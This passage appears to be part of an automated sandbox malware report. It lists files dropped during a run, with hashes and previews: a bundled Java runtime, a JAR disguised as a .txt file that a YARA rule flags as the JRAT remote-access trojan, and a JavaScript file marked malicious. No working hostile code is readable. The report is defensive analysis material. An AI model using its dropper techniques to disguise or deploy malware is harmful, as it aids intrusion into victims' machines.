                                                                                                                                                                                                                                  SSDEEP:24:hjrUah3ontU2H+h/ic1mo8vwwQcNpIjLSkLuodAZdgh1y0ykt0wS5:R4fc17wVNwltpU
                                                                                                                                                                                                                                  MD5:BFDD90599E2E55FFD9378DFEB8AC1760
                                                                                                                                                                                                                                  SHA1:9D7C4615FF9E3902F1A19771E89E6B6423C2098D
                                                                                                                                                                                                                                  SHA-256:6191396D66399276D466B8CC9C932EA3F7F3FACCB6876A60234A05EA0580701F
                                                                                                                                                                                                                                  SHA-512:AA71631AA5DBB445EA66D946DDED9707DF5BB6DBF03F272A643C2AC3CB8AEAD3CF1F9C37D4CC43561FBE19C506EE4C1543F6B38EC432A959619C31AE049AB6A8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.// Standard extensions get all permissions by default..grant codeBase "file:${{java.ext.dirs}}/*" {. permission java.security.AllPermission;.};..// default permissions granted to all domains..grant {. // Allows any thread to stop itself using the java.lang.Thread.stop(). // method that takes no argument.. // Note that this permission is granted by default only to remain. // backwards compatible.. // It is strongly recommended that you either remove this permission. // from this policy file or further restrict it to code sources. // that you specify, because Thread.stop() is potentially unsafe.. // See the API specification of java.lang.Thread.stop() for more. // information.. permission java.lang.RuntimePermission "stopThread";.. // allows anyone to listen on dynamic ports. permission java.net.SocketPermission "localhost:0", "listen";.. // "standard" properies that can be read by anyone..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\java.security

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):57227
                                                                                                                                                                                                                                  Entropy (8bit):4.869557420477606
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:rn4LHAEcqrlANbX7qL1AdL3naP2rOpOQSvbOETyqp+Z+Ijt+M38ykbLIsS8e677c:rs2aVOQCbOETyqpmLjt1CLze0YKQN3F
                                                                                                                                                                                                                                  MD5:8F0E3440FFFDBCAA9D26BE4730492A66
                                                                                                                                                                                                                                  SHA1:20A3E5A8ECBEC20D41D7124120D264F61DE96613
                                                                                                                                                                                                                                  SHA-256:B5E8205764B83F46B50187B2021DE7C86A890DF908A8D6C17275A68924F832C6
                                                                                                                                                                                                                                  SHA-512:C04528769CE780E730EF71803CA8191C217F571F62703DACA273499B90E93101383A3699263458C205CD7A8733399C3C2CA6AFC85B6843C2C5E2BA0890E762CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default...#..# If this properties file fails to load, the JDK implementation will throw..# an unspecified error when initializing the java.security.Security class.....

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\javaws.policy

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):98
                                                                                                                                                                                                                                  Entropy (8bit):4.75309355004813
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:FGIWgjM0ePFUN1/6IGNDAPVn7n:8c2PFUqIrR7
                                                                                                                                                                                                                                  MD5:9107D028BD329DBFE4C1F19015ED6D80
                                                                                                                                                                                                                                  SHA1:4384CA5E4D32F7DD86D8BADDD1E690730D74E694
                                                                                                                                                                                                                                  SHA-256:B7A87D1F3F4B7BA1D19D0460FA4B63BD1093AFC514D67FE3C356247236326425
                                                                                                                                                                                                                                  SHA-512:81B14373B64CE14AF26B70D12D831E05158D5A4FA8CEC0508FEF8A6CA65B6F4EF73928F4B1E617C68DDEACFF9328A3D4433B041B7FB14DE248B1428C51DBC716
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.grant codeBase "file:${jnlpx.home}/javaws.jar" {. permission java.security.AllPermission;.};..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\policy\limited\US_export_policy.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3482
                                                                                                                                                                                                                                  Entropy (8bit):7.607020082691535
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:nON9byV15nrrNtL5rbszDMO6MS+zrHPjfi2UXHII:Q9b+d9x5EzDM8N32PX1
                                                                                                                                                                                                                                  MD5:0D59C5639AA24C7D326E7BD54BB8EDA5
                                                                                                                                                                                                                                  SHA1:58875D7463460D7998C4013912FB89965E823044
                                                                                                                                                                                                                                  SHA-256:9CE50A70ED7051C155AB8EA06755F94823D8D1CBA67FFD8FD3FE3249B3AC31EA
                                                                                                                                                                                                                                  SHA-512:2175B0CB6FF8B3AFE37FB24EBEEF406D7920BE404EE66597A47699607A9B39F981C023F7E4133359FEF9910FE7885BA846D3C532B22891A8231E23EAF440896D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........k..P................META-INF/MANIFEST.MFe..N.@...;..G..b..x........^...5..e...z...$3..@ZVB/..D.xk.G.P.WL.......l4.5k...........nd........E...3u.*....l..AP.$.zU...-.,.c...F.}c[....,/...c>ld.pC...].a...v....?Y@I.Zf..`./....../.p..u.L.(w.;l....a.,........KI..?..PK..X,.........PK........k..P................META-INF/ORACLE_J.SFu.Ks.0...;3.....k. 2.O.Q..&..S4.!b..W.Cg..mO...S(...[.+...V[...v4]u.F.P....;..ZBp.z..2.......eU1.n.kE.pN..-.,)..F>y....ll...M....F..........z.3 .....w..W..3.GP.L....F..t4.<,9L.Hq./...v.Q.d.'d*.;..%.....7$u.u.......)N...2..^..2....>.<.......(.M...[.h..H.._?.XW.Wb....H.F.....[zY../.N~q...f./..PK.....W2.......PK........k..P................META-INF/ORACLE_J.RSA3h..f..j.h.......S..S.......3..1...........qA.{.A....&........8l.m.....2H.T.#7P[....$.s(.....QbrN..s~QA~QbIf~...."H..G.+.,Q!8?..<...&%U!83=/3/.P.@....G....EJ...@N.............$J..............&F%do.C......(.........^/............M.....\y<...oCo....,..=.W.ny.......R...S.0}..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\policy\limited\local_policy.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3984
                                                                                                                                                                                                                                  Entropy (8bit):7.610750460615757
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:WBzPKA45zM5nrrNtL5rbszDMp4HeFteOjfiG2:azPKH5zMd9x5EzDMp4HQteDG2
                                                                                                                                                                                                                                  MD5:6280D06E46E0CC047E04C85C83874566
                                                                                                                                                                                                                                  SHA1:7D0A29932B496EDBDD1FC55572014BC89703AD07
                                                                                                                                                                                                                                  SHA-256:92780525250258F336A8F746ED7437035512D06050D85786FB44FDF12E08419C
                                                                                                                                                                                                                                  SHA-512:E3EF446B02943915F874DC09433833E5FF131ABAD93D04F95AA6E887881CBF71B15AD0F41E8C7D57864A003559BBC3769452B17600664207308AE99340BFB46E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........l..P................META-INF/MANIFEST.MF..Mo.0...;............Q...q...?...R.R?.t.-.a.'y.....,.R.[P%.y.x..m...Z..V.S...g..p.7.o.....o..-.yX*L88c..PX.G..7.A..!........)8#.b4t..=w...?p.f.og.4...j.W..kn..z.<......:.N_~l.!....Cz.d...=^...#......ge:....6E..].J.8h&.dFV,..E..lT....Fz....y..nw.:;........PK..y......h...PK........l..P................META-INF/ORACLE_J.SF..AO.@...{....n6..]d .P`..R.U.....0...83..W.A.1....P........e.fLf..&..u...`...2Z.....R........a.D.p.sMg........x<.....[Rn......Vv5'V8.$...A.g....R..k.4w}e.....Uy.....*\....Lf{.2..D@Tc.o.o.T/.~.G...6...\.V..E.....9..n.J,Y.MS.'..V..da.wg9.K9=...b....O..?..Y....4.l..Y.q8]...a...b.`.0..h.m'..+..W.@._....Z...7....nXd7v.....2f.!D..>.PK.....\.......PK........l..P................META-INF/ORACLE_J.RSA3h..f..j.h.......S..S.......3..1...........qA.{.A....&........8l.m.....2H.T.#7P[....$.s(.....QbrN..s~QA~QbIf~...."H..G.+.,Q!8?..<...&%U!83=/3/.P.@....G....EJ...@N.............$J..............&F%do

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\policy\unlimited\US_export_policy.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3482
                                                                                                                                                                                                                                  Entropy (8bit):7.607316004726179
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:BOb9byVP5nrrNtL5rbszDMO6MS+zrHPjfiwIXHII:o9b8d9x5EzDM8N32NX1
                                                                                                                                                                                                                                  MD5:6CBCA5808B4A8613D2FED6FE4A84C449
                                                                                                                                                                                                                                  SHA1:0135B30EBEC03FB69D79CDC3126E608D9EFFB8B2
                                                                                                                                                                                                                                  SHA-256:761AAB2969883E9E5EA76DF63CA404FB67673EFC3F97DEF057F8E22517FC9518
                                                                                                                                                                                                                                  SHA-512:4D9BF052AA124D07673C601CBFB83223B87369F7BE7575A13E13C0D893E57849BA11E430B7769901782C26471528DFAA130996916451E1A7E38CF28468E44CFA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........m..P................META-INF/MANIFEST.MFe..N.@...;..G..b..x........^...5..e...z...$3..@ZVB/..D.xk.G.P.WL.......l4.5k...........nd........E...3u.*....l..AP.$.zU...-.,.c...F.}c[....,/...c>ld.pC...].a...v....?Y@I.Zf..`./....../.p..u.L.(w.;l....a.,........KI..?..PK..X,.........PK........m..P................META-INF/ORACLE_J.SFu.Ks.0...;3.....k. 2.O.Q..&..S4.!b..W.Cg..mO...S(...[.+...V[...v4]u.F.P....;..ZBp.z..2.......eU1.n.kE.pN..-.,)..F>y....ll...M....F..........z.3 .....w..W..3.GP.L....F..t4.<,9L.Hq./...v.Q.d.'d*.;..%.....7$u.u.......)N...2..^..2....>.<.......(.M...[.h..H.._?.XW.Wb....H.F.....[zY../.N~q...f./..PK.....W2.......PK........m..P................META-INF/ORACLE_J.RSA3h..f..j.h.......S..S.......3..1...........qA.{.A....&........8l.m.....2H.T.#7P[....$.s(.....QbrN..s~QA~QbIf~...."H..G.+.,Q!8?..<...&%U!83=/3/.P.@....G....EJ...@N.............$J..............&F%do.C......(.........^/............M.....\y<...oCo....,..=.W.ny.......R...S.0}..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\policy\unlimited\local_policy.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3490
                                                                                                                                                                                                                                  Entropy (8bit):7.6129558656260246
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qQXebz5nrrNtL5rbszDMXNQIh3WEXjfi3f:BXefd9x5EzDMnWE+3f
                                                                                                                                                                                                                                  MD5:360663F26C5584E6C6127254B261FA0C
                                                                                                                                                                                                                                  SHA1:AEE6515EEDE2AD7C697BA8A61BDD9359BE3319D2
                                                                                                                                                                                                                                  SHA-256:02F69A433405EA928C89A8AADE74E5462282CCB9A9D30851312ED3459398F85C
                                                                                                                                                                                                                                  SHA-512:E3920D5ABBBE6B0E3029ED1E0B2CE1A53DA6C7E728F635B12F00B1FD2EB6151FFF74B9DC85EC0C0920F7FDA440C1604D24CA766CDBCB78BE3425088D97E00208
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........n..P................META-INF/MANIFEST.MFe.Ao.@...;..a.m.R.(.... -Zj..H.....<.,U...^z.m..|.-k..:MsP...#S.6.@..F.i.M.O...)j..p....m.Zva...U.K .....#uo....j..........Z......+:./h(..G..;.w...k.d.?...:.7._.....s...>.....C.E..'k.&".l.&.p.NpN....C...}...K..=..r.K..PK..m...........PK........n..P................META-INF/ORACLE_J.SFu.Mo.0...;...-..*.#...M...p1..Z.......K....~.?+F9RZ.sKd..w..X-c....d...Z.s...{0n......]@...!.[Q..._&v.w....Esj. .b..s.g.|:..+.@\k.}@.&N.1}?U...+..E0..r2.6...~J.w..)....g...=....D.$..........2"t!.....R.K.Q.D...w..f.F...v.,.S........k.......(..?v-..d.XU.%!..x.]..-..Yq.o..5L........P*....PK....X{........PK........n..P................META-INF/ORACLE_J.RSA3h..f..j.h.......S..S.......3..1...........qA.{.A....&........8l.m.....2H.T.#7P[....$.s(.....QbrN..s~QA~QbIf~...."H..G.+.,Q!8?..<...&%U!83=/3/.P.@....G....EJ...@N.............$J..............&F%do.C......(.........^/............M.....\y<...oCo....,..=.W.ny.......R...S.0}.....J..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\public_suffix_list.dat

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):232158
                                                                                                                                                                                                                                  Entropy (8bit):5.128878765472157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:5vHezQvyRwG1Ndqf4szTx+3YUmdzGWMmcLzRIXwhvjxlO8nQB7zxNlqW1Gy2Q/Ef:5veni4wvqhQciKPS+
                                                                                                                                                                                                                                  MD5:1EF19D3FC87C286EEC9C51B480E3AA1C
                                                                                                                                                                                                                                  SHA1:FC105D78083044261065296645D95A8FEF1E5F96
                                                                                                                                                                                                                                  SHA-256:0E547437025419F85C5843702119A7CE6D5CAD7BF039B8AB5499514D4599D0E4
                                                                                                                                                                                                                                  SHA-512:5E37DE082ABEBF26B29BA8C2FC69A319EA19C7010DA7AFBD5D73E81555B5A38F8A2C2F015A64AD768289DC1097D47FE944CFB66D0EE95879B420000FC20D3912
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK..........!.................aaaUT.......cHLL...PK...u..........PK..........!.................aarpUT.......cHL,*...PK...C..........PK..........!.................abarthUT.......cHLJ,*....PK....v........PK..........!.................abbUT.......cHLJ...PK..............PK..........!.................abbottUT.......cHLJ./)...PK..q`.u........PK..........!.................abbvieUT.......cHLJ*.L...PK..Wk .........PK..........!.................abcUT.......cHLJ...PK..O..........PK..........!.................ableUT.......cHL.I...PK..n.-=........PK..........!.................abogadoUT.......cHL.OOL....PK..y.%.........PK..........!.................abudhabiUT.......cHL*M.HL....PK...b."........PK..........!.................acUT.......cHL.bH.....).`:=..L......0._....S..@4.PK...U.9)...<...PK..........!.................academyUT.......cHLNLI..b.OK.L.L.....PK.....a........PK..........!.................accentureUT.......cHLNN.+)-J...PK.....z........PK..........!.................accountantUT.......c

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\sound.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1210
                                                                                                                                                                                                                                  Entropy (8bit):4.681309933800066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:va19LezUlOGdZ14BilDEwG5u3nVDWc/Wy:iaLGr1OsS5KnVaIWy
                                                                                                                                                                                                                                  MD5:4F95242740BFB7B133B879597947A41E
                                                                                                                                                                                                                                  SHA1:9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
                                                                                                                                                                                                                                  SHA-256:299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
                                                                                                                                                                                                                                  SHA-512:99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# Sound Configuration File.############################################################.#.# This properties file is used to specify default service.# providers for javax.sound.midi.MidiSystem and.# javax.sound.sampled.AudioSystem..#.# The following keys are recognized by MidiSystem methods:.#.# javax.sound.midi.Receiver.# javax.sound.midi.Sequencer.# javax.sound.midi.Synthesizer.# javax.sound.midi.Transmitter.#.# The following keys are recognized by AudioSystem methods:.#.# javax.sound.sampled.Clip.# javax.sound.sampled.Port.# javax.sound.sampled.SourceDataLine.# javax.sound.sampled.TargetDataLine.#.# The values specify the full class name of the service.# provider, or the device name..#.# See the class descriptions for details..#.# Example 1:.# Use MyDeviceProvider as default for SourceDataLines:.# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider.#.# Example 2:.# Specify the default Synthesizer by it

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\tzdb.dat

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103785
                                                                                                                                                                                                                                  Entropy (8bit):7.157129447913368
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:d0EQmcI53atcLHXMBa9LadfFE3o6/////VMhPaDGdarIa6UWgnKhgEjK:dTtzDXMEJaenZDG4rx6UWxhgEjK
                                                                                                                                                                                                                                  MD5:53657D061C8233BDE2DC4D98918D7F89
                                                                                                                                                                                                                                  SHA1:FE5E2734AA810C3212A5078996DEB357137B61F0
                                                                                                                                                                                                                                  SHA-256:612BADE1C96FD5658FC1D881405381B99124D4F548A1604AC7A869235E6F819D
                                                                                                                                                                                                                                  SHA-512:0FE2756FE720E207CC4CC3D9C82BE8DA96568111E79F68FEF47E58A874AF4A3C4B7B50745B5763A52F11E6BFC57E1043098C2156356E36B18345DBE70FA7B75A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...TZDB....2023c.[..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\tzmappings

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9577
                                                                                                                                                                                                                                  Entropy (8bit):5.17061677089257
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:qwfOC9OYOxUmHomjgDwlZ+TFXsq2H+aUHCHQj4SV0l2:qqgniTyq06a2
                                                                                                                                                                                                                                  MD5:62BC9FA21191D34F1DB3ED7AD5106EFA
                                                                                                                                                                                                                                  SHA1:750CC36B35487D6054E039469039AECE3A0CC9E9
                                                                                                                                                                                                                                  SHA-256:83755EFBCB24476F61B7B57BCF54707161678431347E5DE2D7B894D022A0089A
                                                                                                                                                                                                                                  SHA-512:AF0DDB1BC2E9838B8F37DC196D26024126AC989F5B632CB2A8EFDC29FBCE289B4D0BAC587FE23F17DFB6905CEADA8D07B18508DB78F226B15B15900738F581A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This file describes mapping information between Windows and Java.# time zones..# Format: Each line should include a colon separated fields of Windows.# time zone registry key, time zone mapID, locale (which is most.# likely used in the time zone), and Java time zone ID. Blank lines.# and lines that start with '#' are ignored. Data lines must be sorted.# by mapID (ASCII order)..#.# NOTE.# This table format is not a public interface of any Java.# platforms. No applications should depend on this file in any form..#.# This table has been generated by a program and should not be edited.# manually..#.Romance:-1,64::Europe/Paris:.Romance Standard Time:-1,64::Europe/Paris:.Warsaw:-1,65::Europe/Warsaw:.Central Europe:-1,66::Europe/Prague:.Central Europe Standard Time:-1,66::Europe/Prague:.Prague Bratislava:-1,66::Europe/Prague:.W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:.FLE:-1,67:FI:Europe/Helsinki:.FLE Standard Time:-1,67:FI:Europe/Helsinki:.GFT:-1,6

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\release

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):5.2690414774929515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:tqrYHUkP9q9N3erYHUkr0IKDKqvrYHQgPqmjxhuDmgwfW0Xh6/V9Wvn:GqDg9N30qHHkKqzqLSmzx1XhaV9Wv
                                                                                                                                                                                                                                  MD5:5C744F7CA070554D8EF8DA25A8ECC498
                                                                                                                                                                                                                                  SHA1:DEA9B7499DA7A0CBC32859228A931BC692264121
                                                                                                                                                                                                                                  SHA-256:ECB941D946F99FF9910DEB9C5E54B9D577C69FB4D2D0B7094D476671DA965B2E
                                                                                                                                                                                                                                  SHA-512:FC53839EA0CCD78F250F00F55FCE82CC29A5C5DDA13E8A6DF298633567AF6A66D56534110DEA51F1D43A3620383E32E0EF3A1CFD70827667C4E67EDCDE7CD949
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:JAVA_VERSION="1.8.0_381".JAVA_RUNTIME_VERSION="1.8.0_381-b09".OS_NAME="Windows".OS_VERSION="5.1".OS_ARCH="i586".SOURCE=".:git:543f7df00d44+".BUILD_TYPE="commercial".

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\krmyqqmohp.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):490747
                                                                                                                                                                                                                                  Entropy (8bit):7.993198601307523
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:x8h4GbbFN8rQO/rATlnt85pxogQNUhIK/0c2qnAU:x83T88O/NsS7B2qnl
                                                                                                                                                                                                                                  MD5:D7D1131452A0427E78A2710D280537B5
                                                                                                                                                                                                                                  SHA1:279B601CB79C5D1790910C839125A45B2F43101D
                                                                                                                                                                                                                                  SHA-256:4C81C42509988B29C4D77288ED55849DE919676FBCA4A938BF773F893F2E547E
                                                                                                                                                                                                                                  SHA-512:483D03F5DCF0011679463A68F233CB50796C056D1045CC6EEACCAE41FFBE51E562A186F6CD6196B0C3B63631553A7D780D6D77648117903E4D58238B2EF8D198
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, Author: Florian Roth
                                                                                                                                                                                                                                  Preview:PK.........^.X................META-INF/MANIFEST.MF....M.1..0...@..:.XA(.jq.b.D...4....H.....o....=..<(&q...w..b.Y..H=b?.d.....D.*u8]$(4N4.c....:..4............X...W.1.. .@.H..,...v'...U..........5g.9.~...-...7PK....! ........PK.........^.X................w/T/Zq.GQd..@..,.?.}.T..;:Wo....T/...a.^.ki...IF.Q:.....{...D&...F~l...}.c..^.y....p......<^.....M...:..|.....A'.....@.......z-..=..B#..A^.F.r....X3>...YH...u.N.e.`.....#&]....m....7.....:!.....D(..{.....!..|\vX.....w.Y\*...)a+......wt...*... ..../%j....,%sy...}<.o....%...#.1.k......gt.........R.q}..........c1u>.....o2..).j.c3.$.....Gb..|~*X..k(/K.>{..Tb......6..{..8.=.....}...>y..J..#.+....S.m.O.m...L....{....g..a.h..Z:e..}..vl.X@.kp........\..X.)............e....y..7&.^K..dil...[R.~.hT:$C..".kT..L.v`.e7...........^x.$.f.|...Kz@8.e^..)(....#...=.D{5.<C..r...}..........8+W..a.@..z...D.29.k.y.ig...!...x..._..)+..."..FW.....6.rr...7E^_W..P..0.......2...S.Nk.....Y..w..ec..C...f.f......a$.

                                                                                                                                                                                                                                  C:\Users\user\GMyJTnezbTa\ID.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                  Entropy (8bit):4.102149223879969
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YwwAHI3zbScnhF+WGMTWSYn:YwwAH+rn+GTWrn
                                                                                                                                                                                                                                  MD5:0CF869478AEC42973B4B6069ADAC0646
                                                                                                                                                                                                                                  SHA1:153F62078DE43DF78115062A71C70160C6CF4857
                                                                                                                                                                                                                                  SHA-256:6BD9E0FC9A53BABB5407535B999FA7ACCBD578596391014BFEABDB42A9C05218
                                                                                                                                                                                                                                  SHA-512:C4641C3E470C068CAB11A3138B4596CAAD88BC73EEB2C28F5BF799B955BF2A594C7E456D437EA53443ABF7D4BCDCA82CBE3475E856F94A3DD95C4806AA6DD7D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:{"UUID":"59c9cffb-9a92-4e42-9695-f3cc1565f104"}

                                                                                                                                                                                                                                  C:\Users\user\zbrspjjraf.js

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (64499), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):968606
                                                                                                                                                                                                                                  Entropy (8bit):5.656538843820354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:kDl+s5O8GbA13NpCUHVevZ2mA0q/MIqp2web7h1FlJ1yk1EnDjuH3Sq8YG1xWfNB:kks5r19z1UwmAh/2pO5l1OnuXSTG5QK
                                                                                                                                                                                                                                  MD5:1D266565196B28EF3E62398A3FDB63CD
                                                                                                                                                                                                                                  SHA1:D8E7F9D683F3DB330C9225AB708D0A4095F2EEA1
                                                                                                                                                                                                                                  SHA-256:5FC03A19D37C227C9CFE59A5E962956FB46AE2A7969E0CF0EA1F806E201295A0
                                                                                                                                                                                                                                  SHA-512:51F1A887BA9D6886B10263D06811899313DFCB1469EF64F70658875E4A7DA721CF4AEE626C3539762D42183A9A1C17D77CB0B80BC7165DE73481B9E8D261D3A2
                                                                                                                                                                                                                                  Malicious:true
